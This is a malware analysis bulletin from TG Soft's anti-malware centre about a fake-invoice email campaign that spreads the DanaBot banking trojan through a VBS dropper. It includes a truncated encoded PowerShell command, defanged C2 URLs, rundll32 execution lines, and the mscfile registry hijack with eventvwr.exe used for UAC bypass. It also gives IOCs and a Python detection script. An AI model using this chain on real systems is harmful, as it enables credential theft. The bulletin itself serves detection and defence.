27/11/2018
15:44

Malspam campaign continues, spreading the dangerous Trojan DanaBot


The malspam campaign of fake invoices, designed to spread the DanaBot Trojan that exfiltrates logins and passwords, continues.

TG Soft's C.R.A.M. (Anti-Malware Research Center) examined an email from a campaign spreading the DanaBot Trojan, sent on November 27, 2018.

Cyber-criminals use social engineering in fraudulent mass mailings to induce the victim to open infected attachments or click on links in the body of the message.
If you received a suspicious email, send it to C.R.A.M. (Center for Anti-Malware Research): How to send suspicious emails

Fake email "la fattura-X6351" spreads Trojan DanaBot

Description:
The email was detected in the morning of November 27, 2018.
In addition to a short text, the email contains a .rar attachment holding a VBS script that, if executed, leads to the download of the DanaBot malware.

Example of the examined email:

Subject: la fattura-X6351

la fattura-X6351 - Mozilla Thunderbird
From:
Subject: la fattura-X6351
To:
Good morning,

we are sending the invoice, which you will find attached.
Below is a summary of it.

Invoice number: SD/203/11/2018
Date of issue: 2018-11-26
Payment deadline: 2018-12-12

[Ma (REDACTED)]

[SIC (REDACTED)]

1 attachment: F112007.rar


How it spreads:
The e-mail informs the user that an invoice has been sent as an attachment by presenting a brief summary of the invoice in the body of the message (number, date of issue, payment deadline).

The email contains a .rar attachment:
  • File Name: F112007.rar
  • Size: 743 Bytes
  • MD5: C573BC246DED8048115AF4BFD5890B2C

The .rar file in turn contains the dropper, a VBS script:

  • File Name: F112007.vbs
  • Size: 1467 Bytes
  • MD5: 4DAF59E4C6F2CFBF699737A23E15ECE7
  • Malware family: Dropper
  • VirIT: Trojan.VBS.Dropper.BDE

Once the VBS file is executed, it repeatedly attempts to connect to the site:

  • https://kortusops[.]icu

The VBS script receives various VBScript or PowerShell commands from kortusops[.]icu, for example:

powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AY
QBkA[........]bwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AJwAg
ACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==

One of the PowerShell commands tries to connect to the URL flutysowf[.]club/chkesosod/downs/EFnfZ, without success. Others instead connect to the URL http[:]//kortusops[.]icu/fax[.]php?id=admin

The received commands download the malware payload into the user's temporary folder (%TEMP%):
  • File Name: iVRYziRI.dll
  • Size: 307200 Bytes
  • Compilation date: 26/11/2018 - 22:53:06
  • MD5: 54F9A571CEFD6FA6A9E855BF5F6777D7
  • Malware family: DanaBot
  • VirIT: Trojan.Win32.DanaBot.AT
The downloaded DLL is then executed with the command: C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1

An additional command sent by kortusops[.]icu modifies the registry key HKCU\Software\Classes\mscfile\shell\open\command, setting its value to: C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1

The system process "eventvwr.exe" is then executed; through the previously modified key, it launches the malware DLL with the same command: C:\WINDOWS\System32\rundll32.exe C:\Users\[UTENTE]\AppData\Local\Temp\iVRYziRI.dll,f1
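As an added illustration (not code from TG Soft's analysis), the following Python script shows how a defender could flag each stage of this chain in process-creation and registry telemetry: the encoded PowerShell command is decoded, rundll32 loading a DLL from %TEMP% is reported, the mscfile handler change is caught, and a rundll32 child of eventvwr.exe is tagged as the auto-elevation abuse. The pipe-delimited log format, the user name alice and the harmless stand-in decoded script are constructed assumptions.

```python
import base64
import re

# Constructed sample telemetry (not from the original analysis) in a simple
# "type|key=value|..." form, following the chain described above: VBS dropper,
# encoded PowerShell, rundll32 with a %TEMP% DLL, mscfile hijack, eventvwr.exe.
SCRIPT = "$path = '/fax.php?id=admin'; 'http://' + $hostname + $path"  # harmless stand-in
ENC = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE_LOG = r"""
proc|image=C:\Windows\System32\WScript.exe|cmd=wscript.exe F112007.vbs|parent=explorer.exe
proc|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -EncodedCommand ENC_B64|parent=wscript.exe
proc|image=C:\WINDOWS\System32\rundll32.exe|cmd=rundll32.exe C:\Users\alice\AppData\Local\Temp\iVRYziRI.dll,f1|parent=powershell.exe
reg|key=HKCU\Software\Classes\mscfile\shell\open\command|value=C:\WINDOWS\System32\rundll32.exe C:\Users\alice\AppData\Local\Temp\iVRYziRI.dll,f1
proc|image=C:\WINDOWS\System32\rundll32.exe|cmd=rundll32.exe C:\Users\alice\AppData\Local\Temp\iVRYziRI.dll,f1|parent=eventvwr.exe
proc|image=C:\Windows\System32\notepad.exe|cmd=notepad.exe|parent=explorer.exe
""".strip().replace("ENC_B64", ENC)

ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
TEMP_DLL = re.compile(r"\\AppData\\Local\\Temp\\\S+\.dll,\s*\S+", re.I)
MSCFILE_KEY = re.compile(r"\\Classes\\mscfile\\shell\\open\\command$", re.I)

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def parse_event(line):
    kind, _, rest = line.partition("|")  # first token is the event type
    fields = dict(f.split("=", 1) for f in rest.split("|"))
    fields["type"] = kind
    return fields

def analyse(log_text):
    """Return (tag, detail) alerts, one per stage of the chain seen in the log."""
    alerts = []
    for raw in log_text.splitlines():
        ev = parse_event(raw)
        if ev["type"] == "proc":
            decoded = decode_encoded_command(ev["cmd"])
            if decoded is not None:
                alerts.append(("encoded-powershell", decoded))
            if "rundll32" in ev["image"].lower() and TEMP_DLL.search(ev["cmd"]):
                # eventvwr.exe auto-elevates, so a rundll32 child of it means the
                # hijacked mscfile handler ran the DLL with elevated rights.
                bypass = ev["parent"].lower() == "eventvwr.exe"
                alerts.append(("uac-bypass-eventvwr" if bypass else "rundll32-temp-dll", ev["cmd"]))
        elif ev["type"] == "reg" and MSCFILE_KEY.search(ev["key"]):
            alerts.append(("mscfile-hijack", ev["value"]))
    return alerts
```

Running analyse(SAMPLE_LOG) yields four alerts in chain order; the first carries the decoded PowerShell text, which is what an analyst would inspect next.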



The DanaBot malware tries to connect to its command and control (C&C) servers (ten IP addresses were observed during the analysis).
The third stage of the malware is to establish persistence on the infected PC through a service that runs the malware every time the PC is restarted. However, this stage was not completed during the analysis.

The purpose of the malware is to exfiltrate login credentials for important sites, such as home banking, e-mail, FTP, etc.

Further analysis of the DanaBot malware is available at these addresses:

IOC

MD5:
C573BC246DED8048115AF4BFD5890B2C
4DAF59E4C6F2CFBF699737A23E15ECE7
54F9A571CEFD6FA6A9E855BF5F6777D7


URL:
kortusops[.]icu -> ip: 37[.]10[.]71[.]87
flutysowf[.]club -> ip: 195[.]123[.]216[.]31
How to identify a fake email

Experience and common sense are the first weapons against these kinds of scams.
Careful reading of the email, in all its elements, is essential. Be wary of compressed attachments (ZIP, RAR and similar) and, if possible, DO NOT enable automatic macro execution. Enabling automatic execution of macros is strongly discouraged, since simply opening Word and Excel files would then run their macros immediately without any prior alert.
If you have been infected by a banker, the advice from TG Soft's C.R.A.M. is to take appropriate security precautions even after the remediation of the system(s) involved, such as changing the most commonly used passwords on the Web. If the workstation involved is used for home-banking transactions, a check with your credit institution is also recommended.

How to send suspicious emails for analysis as possible virus/malware/ransomware and/or Phishing attempts

Sending materials to TG Soft's Anti-Malware Research Center for analysis, which is always free of charge, can be done safely in two ways:
  1. Any suspicious email can be forwarded directly from the recipient's e-mail client to lite@virit.com, choosing "Forward as Attachment" as the sending mode and using "Possible phishing page to verify" or "Possible Malware to verify" as the subject;
  2. Save the e-mail to be sent to TG Soft's C.R.A.M. for analysis as a file external to the e-mail program used. The resulting file must be sent by uploading it from the page Send Suspicious Files (http://www.tgsoft.it/italy/file_sospetti.asp). If you want feedback on the analysis of the submitted data, you must indicate an e-mail address and a brief description of the reason for the submission (for example: possible / probable phishing; possible / probable malware or other).
All this is to help you avoid credential theft, viruses/malware or, even worse, next-generation Ransomware / Crypto-Malware.
 

Integrate your PC / SERVER protection with Vir.IT eXplorer Lite

If you are not yet using Vir.IT eXplorer PRO, it is advisable to install Vir.IT eXplorer Lite -FREE Edition- alongside the antivirus already in use, to increase the security of your computers, PCs and SERVERs alike.

Vir.IT eXplorer Lite has the following special features:
  • freely usable in both private and corporate environments, with Engine+Signature updates without time limitation;
  • interoperable with any other AntiVirus, AntiSpyware, AntiMalware or Internet Security already present on PCs and SERVERs. We recommend using it as a supplement to the AntiVirus already in use, as it does not conflict with or slow down the system, but allows a significant increase in security in terms of identification and remediation of infected files;
  • identifies and, in many cases, also removes most of the viruses/malware currently circulating or, alternatively, allows them to be sent to the C.R.A.M. Anti-Malware Research Center for further analysis to update Vir.IT eXplorer PRO;
  • through the Intrusion Detection technology, also available in the Lite version of Vir.IT eXplorer, the software is able to report new-generation viruses/malware that have installed themselves automatically and to send the reported files to TG Soft's C.R.A.M.
  • Proceed to download Vir.IT eXplorer Lite from the official distribution page of TG Soft's website.

For Vir.IT eXplorer PRO users...

 

For Vir.IT eXplorer PRO owners, it is also possible to contact TG Soft's technical phone support free of charge. The details can be found on the support page CLIENTS.
 


C.R.A.M.
TG Soft's Anti-Malware Research Center

 




Any information published on our site may be used and published on other websites, blogs, forums, facebook and/or in any other form both in paper and electronic form as long as the source is always and in any case cited explicitly “Source: CRAM by TG Soft www.tgsoft.it” with a clickable link to the original information and / or web page from which textual content, ideas and / or images have been extrapolated.
It will be appreciated in case of use of the information of C.R.A.M. by TG Soft www.tgsoft.it in the report of summary articles the following acknowledgment/thanks “Thanks to Anti-Malware Research Center C.R.A.M. by TG Soft of which we point out the direct link to the original information: [direct clickable link]”
